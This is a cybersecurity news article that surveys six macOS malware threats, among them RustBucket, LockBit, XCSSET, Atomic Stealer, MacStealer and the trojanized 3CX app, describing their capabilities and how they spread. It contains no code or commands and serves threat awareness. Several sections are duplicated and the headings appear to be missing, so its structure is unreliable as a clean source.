Top macOS Malware Threats: Here Are 6 to Watch
Apple's growing market share — in a shrinking PC market — and the growing use of Golang for malware development is pushing a gradual increase in malicious tools targeting macOS environments.
June 1, 2023
![Software Update page in the System Preferences on a MacBook Air laptop computer. Software Update page in the System Preferences on a MacBook Air laptop computer.](https://eu-images.contentstack.com/v3/assets/blt6d90778a997de1cd/blt63a6f535cb480432/64f176a993e5e1a078b14bd3/macmalware_Tada_Images_shutterstock.jpg?width=700&auto=webp&quality=80&disable=upscale)
Source: Tada Images via Shutterstock
Since at least December, North Korea's BlueNoroff threat actor — a subgroup of the broader Lazarus group — has been using malware dubbed RustBucket in financially motivated attacks against targeted organizations worldwide. The malware marks the threat group's first foray into the macOS realm and is an example of how attackers have increasingly begun using cross-platform languages like Go to develop attack tools for multiple platforms.
Researchers from Jamf Threat Labs reported on the malware in April 2023 after observing BlueNoroff using it to drop and execute various payloads on victim systems. The malware consists of a first-stage component (a backdoored but fully functional PDF reader) that reaches out to a remote command-and-control (C2) server, and installs a separate, second-stage payload for gathering specific information from the victim system and relaying it back to the attacker.
Jaron Bradley, senior manager of macOS detections at Jamf, says the sophistication is not only inside the malware itself, but the social engineering tactics that the attackers use in order to get onto victim systems. "This malware campaign targets Windows as well," Bradley says. "But the fact that the attackers have gone out of their way to include a macOS version of the malware tells us that … they have likely hit roadblocks in the past … on the macOS platform."
After tormenting organizations running Windows systems for more than two years, the operators of the LockBit malware family began targeting macOS users some time last November. In doing so, they became the first major ransomware gang to attempt to infiltrate Apple's famed walled garden and wreak the same havoc there as they have wreaked in Windows environments. Researchers from SentinelOne and other security vendors that inspected the malware found it compiled solely for systems running Apple silicon — namely M1 and M2 architectures.
So far at least, there has been no reported instances of the Mac version of LockBit in the wild, neither have there been any known victims of the malware. However, early reports of the Mac version being non-functional, are incorrect, according to SentinelOne. Though the sample the security vendor inspected appeared to be still in the development stage, it had functions for encrypting data on macOS systems and appeared to be a "direct descendant of the LockBit for Linux variant first spotted in Jan 2022," SentinelOne said.
"Despite the underdeveloped nature of the samples, it is clear that the authors are experimenting with similar functionality seen in lockers for other platforms," SentinelOne observed. "The malware is intended to be executed by a human operator or configuration file and offers a number of different encryption options."
Though relatively older compared to most current macOS malware, XCSSET remains one of the most dangerous threats to Mac users in recent years. Trend Micro discovered XCSSET in 2020 when investigating a security incident related to Xcode developer projects. At the time, Trend Micro found the malware exploiting two separate zero-day vulnerabilities: one to steal Safari browser cookies and the other to install a developer version of Safari of victim systems. Trend Micro's analysis showed the malware spreading via Xcode projects and applications that the malware had maliciously modified.
About one year after Trend Micro disclosed the threat, researchers from Jamf found the malware was actually exploiting three zero-day vulnerabilities to bypass Apple's Transparency Consent and Control (TCC) framework to execute a variety of malicious actions on compromised systems.
XCSSET can read and dump data from Safari browsers; inject JavaScript backdoors into websites; steal information from the victim's Skype, Telegram, WeChat, Notes, and other apps; take screenshots; encrypt files; and exfiltrate data to attacker-controlled systems.
Bradley from Jamf says one notable aspect of the malware is its exploitation of three separate vulnerabilities — all zero-days at the time of discovery. One enables full disk access without the user's explicit permission, one enables screen recording permissions without the user's explicit permission, and one dumps protected Safari browser cookies and performs other malicious browsing techniques.
"Another unique thing about this malware was the way in which it spread through shared Xcode projects," Bradley notes. "If one of these Xcode projects was downloaded and built by a developer, the other projects on their system would then also be infected thus leading to worm-like activity and potentially even effecting the supply chain if landing on the right developer system."
In August 2022, SentinelOne reported finding a new XCSSET variant that spread via a fake Mail app and a fake Notes app instead of via Xcode projects as it did initially.
The Atomic macOS Stealer (AMOS), or just Atomic Stealer as some call it, is a threat that Mac users need to keep an eye on. AMOS is one of the most recent of several information stealers targeting macOS systems that have surfaced over the past year.
According to Mekala Manoj Reddy and Alfred Alvarado, researchers at Trellix, the malware is available to cybercriminals under a malware-as-a-service (MaaS) model via criminal forums, and via a dedicated Telegram channel. It retails for $1,000 per month, according to SentinelOne, which reported on the threat in May. For that price, purchasers get access to a web panel and a disk-based installer for launching and managing attacks.
From a functionality standpoint, AMOS is not very different from other macOS-specific information stealers. SentinelOne's analysis showed the malware as capable of stealing password session cookies, browser data, auto-fills, and crypto wallets such as Electrum, Binance, and Exodus. Other macOS information stealers such as Pureland and Macstealer offer similar capabilities, but the developers of Atomic Stealer offer "by far the most complete package, promising cybercriminals a full featured if not particularly sophisticated infostealer," according to SentinelOne.
MacStealer is malware that can steal credentials, cookies, credit cards, and other sensitive data from Firefox, Bravo, and Google Chrome browsers running on Intel M1 and M2-based macOS systems.
The malware affects all versions of macOS from Catalina onwards. Researchers from Uptycs who discovered the threat earlier this year have described MacStealer as capable of extracting a wide range of files from compromised systems including ".txt"; "doc"; ".pdf"; ".xls"; ".ppt"; and ".zip".
The malware is a macOS version of a rapidly increasing number of malware families that uses the Telegram messaging platform for command and control (C2) purposes. The authors of the malware are distributing it via a malware-as-a-service (MaaS) model. According to Uptycs, the malware developer has a mass production order for MacStealer from other threat actors.
"Thus, the malware is likely to be spread more widely," Uptycs has warned.
The macOS version of malware that shipped with digitally signed updates from video conferencing software maker 3CX earlier this year is one of the bigger current threats targeting macOS environments.
A subgroup of North Korea's Lazarus advanced persistent threat (APT) operation introduced the malware into installers for Windows and macOS versions of 3CX's Electron desktop app after gaining access to the company's build environment using stolen credentials. The attackers used the weaponized Windows versions of the app to download additional malware on compromised systems, including a multi-functional backdoor dubbed "Gopuram" capable, among other things, of starting, stopping, and deleting services.
An analysis of the macOS version by Patrick Wardle, founder of the Objective-See Foundation, found the first stage payload to contain functionality similar to that of the weaponized Windows version. Upon installation, the trojanized macOS version of the 3CX app pulled down a second-stage payload named "UpdateAgent" from an attacker-controlled command-and-control server. He found UpdateAgent to include functionality for stealing sensitive account and system-related information from compromised macOS systems and sending it to a remote server.
According to Wardle, "each time the first-stage payload was run, it would (re)download and (re)execute UpdateAgent … meaning, at any time, the Lazarus group hackers could, for targets of interest, update/swap out the UpdateAgent's code, perhaps for a persistent, fully featured implant."
The macOS version of malware that shipped with digitally signed updates from video conferencing software maker 3CX earlier this year is one of the bigger current threats targeting macOS environments.
A subgroup of North Korea's Lazarus advanced persistent threat (APT) operation introduced the malware into installers for Windows and macOS versions of 3CX's Electron desktop app after gaining access to the company's build environment using stolen credentials. The attackers used the weaponized Windows versions of the app to download additional malware on compromised systems, including a multi-functional backdoor dubbed "Gopuram" capable, among other things, of starting, stopping, and deleting services.
An analysis of the macOS version by Patrick Wardle, founder of the Objective-See Foundation, found the first stage payload to contain functionality similar to that of the weaponized Windows version. Upon installation, the trojanized macOS version of the 3CX app pulled down a second-stage payload named "UpdateAgent" from an attacker-controlled command-and-control server. He found UpdateAgent to include functionality for stealing sensitive account and system-related information from compromised macOS systems and sending it to a remote server.
According to Wardle, "each time the first-stage payload was run, it would (re)download and (re)execute UpdateAgent … meaning, at any time, the Lazarus group hackers could, for targets of interest, update/swap out the UpdateAgent's code, perhaps for a persistent, fully featured implant."
Since at least December, North Korea's BlueNoroff threat actor — a subgroup of the broader Lazarus group — has been using malware dubbed RustBucket in financially motivated attacks against targeted organizations worldwide. The malware marks the threat group's first foray into the macOS realm and is an example of how attackers have increasingly begun using cross-platform languages like Go to develop attack tools for multiple platforms.
Researchers from Jamf Threat Labs reported on the malware in April 2023 after observing BlueNoroff using it to drop and execute various payloads on victim systems. The malware consists of a first-stage component (a backdoored but fully functional PDF reader) that reaches out to a remote command-and-control (C2) server, and installs a separate, second-stage payload for gathering specific information from the victim system and relaying it back to the attacker.
Jaron Bradley, senior manager of macOS detections at Jamf, says the sophistication is not only inside the malware itself, but the social engineering tactics that the attackers use in order to get onto victim systems. "This malware campaign targets Windows as well," Bradley says. "But the fact that the attackers have gone out of their way to include a macOS version of the malware tells us that … they have likely hit roadblocks in the past … on the macOS platform."
About the Author(s)
You May Also Like
CISO Perspectives: How to make AI an Accelerator, Not a Blocker
August 20, 2024Securing Your Cloud Assets
August 27, 2024